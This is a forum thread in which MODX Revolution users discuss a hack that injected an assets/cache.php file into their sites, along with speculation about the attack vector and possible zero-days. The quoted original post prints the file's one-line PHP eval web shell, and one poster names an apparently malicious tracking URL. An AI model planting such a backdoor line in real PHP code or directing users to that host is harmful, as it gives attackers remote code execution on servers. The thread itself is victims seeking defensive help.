Modx Revolution 2.2.6 hack appearing in assets folder

While other folks have suggested the possibility of a pre-2.2.14 breach, in my case I don't believe this to be true. My system did not begin displaying evidence of this hack until after I had upgraded to 2.2.14 (I upgraded in April, and the hack first appeared in May). At first, I thought the attack vector was somewhere else, most likely a configuration of the security on the shared server I'm hosted on. I removed the hostile files and re-loaded 2.2.14 from a clean download; the hack reappeared a day later.

In my case, there was no unexpected MODx user added to my system, so I do not believe the flaw that allowed creation of users was the exploit vector here.

It does seem that the person or people responsible for this attack is/are targeting MODx. I say that because on older versions of MODx, the exploit did attack the create-user flaw, but the same attack now seems to be exploiting another flaw to accomplish the same thing. The person/people behind it would seem to have an intimate understanding of MODx.

On my system, I have examined other possible weaknesses--weak FTP passwords, bad Apache configuration, and so on--and I have been working with my shared hosting provider to examine the shared server configuration looking for flaws. So far, we have not been able to discover how the cache.php file was created or how the MODx files were modified.

I am not prepared to say with 100% certainty that a zero-day exploit exists and is being attacked, but I do think that's a possibility that needs to be taken seriously.

One person reported that the cache.php files had dates of up to a year before they were apparently activated. So you could have had the triggering file hanging around for some unspecified amount of time.

Someone just informed me that their hosting support says that the assets/cache.php file is not a hack, but is something MODX puts in when it upgrades.

I have no such file in my 2.3.1 install and IIRC, people report that file as containing clearly malicious code.

BTW, having the attack occur at some future date is an excellent strategy for hackers. Over time the malicious file(s) will make it into all possible backups.

This file is not part of a normal MODX install, and when it exists, it contains only one line of PHP code whose function is to allow an attacker to run arbitrary PHP commands on the server.

The person has moved his site to a different hosting provider

Hi,I have the same problem with my web site, as Cottagestuff.
At the moment I am using version revo 2.2.8 tradicional.
Here the troublemaker http://stat.rolledwil.biz/stat.php?810239116
can somebody help me with that please?
thank you Zani
[email protected]

Quote from: cottagestuff at Aug 05, 2013, 09:24 PM

Just a note to see if others have had the same problem and know where exactly the vulnerability is. 5 sites using MODX Revolution 2.2.6 had a file injected in the assets folder called cache.php, the contents being:

<!--?php @eval(stripslashes($_REQUEST[ev]));

Does anyone have further information about how that occurs and what needs to be done to stop it in the future?

All sites are now being upgraded to 2.2.8.

-->